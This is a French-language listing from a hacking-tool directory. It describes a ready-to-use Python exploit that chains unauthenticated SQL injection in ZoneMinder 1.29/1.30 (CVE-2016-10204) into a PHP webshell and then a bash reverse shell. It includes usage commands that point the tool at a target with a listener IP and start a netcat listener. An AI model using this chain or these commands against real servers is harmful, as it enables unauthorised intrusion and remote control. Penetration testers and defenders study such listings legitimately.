Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
zoneminder-1.29-1.30-rce-exploit — Injection SQL non authentifiée menant à une exécution de code à distance (RCE) pour ZoneMinder 1.29/1.30 (CVE-2016-10204, EDB-41239). PoC en Python d'une injection SQL en une seule commande vers un webshell puis un reverse shell. | Kitploit
Outils/GitHubGitHub/akash0x00/zoneminder-1.29-1.30-rce-exploit
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionCommandement et ContrôleDéveloppement de Charges Utiles
GitHubakash0x00/zoneminder-1.29-1.30-rce-exploit

zoneminder-1.29-1.30-rce-exploit

Injection SQL non authentifiée menant à une exécution de code à distance (RCE) pour ZoneMinder 1.29/1.30 (CVE-2016-10204, EDB-41239). PoC en Python d'une injection SQL en une seule commande vers un webshell puis un reverse shell.

Voir le dépôt
il y a 18h 3mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

ZoneMinder 1.29/1.30 SQLi vers RCE Exploit

Un exploit Python prêt à l'emploi pour ZoneMinder 1.29/1.30 qui enchaîne l'injection SQL non authentifiée (CVE-2016-10204, EDB-41239) jusqu'à un shell inversé interactif.

Il s'agit d'un PoC weaponized/automatisé pour une CVE connue et corrigée, pas d'un nouvel exploit.

Le PoC EDB pour ce bug s'arrête à la charge utile SQLi ou à « pointez sqlmap dessus ». Cet exploit regroupe la chaîne complète SQLi vers webshell vers shell dans un seul script lisible.

Ce qu'il fait

  1. Confirme l'injection avec une sonde temporelle (SLEEP) sur le paramètre POST limit de index.php?view=request&request=log&task=query.
  2. Écrit un petit webshell PHP dans la racine web via SELECT ... INTO DUMPFILE, en essayant plusieurs chemins courants de ZoneMinder/Apache.
  3. Sonde le webshell actif, puis déclenche un shell inversé bash vers votre listener netcat.

Les deux pièges qu'il gère

  • DUMPFILE, pas OUTFILE. OUTFILE échappe les retours à la ligne et altère le PHP multi-ligne ; DUMPFILE écrit les octets bruts, donc le webshell reste valide.
  • Nom de fichier aléatoire frais à chaque exécution. MySQL refuse d'écraser un fichier existant, donc un nom fixe entre en collision avec un dépôt obsolète d'une exécution précédente.

Utilisation

root@kitploit:~
# pop a shell
python3 zm-exploit.py -u http://TARGET/zm/ -l YOUR_IP -p 443

# start your listener when prompted, in another terminal
sudo nc -lvnp 443

# afterwards, remove the webshell it dropped (name is printed at the end)
python3 zm-exploit.py -u http://TARGET/zm/ --cleanup a1b2c3d4.php

Crédits

  • FOXMOLE (base de l'avis pour CVE-2016-10204).
  • PoC original : Exploit-DB 41239.

Licence

MIT, voir LICENSE.

Télécharger l’outil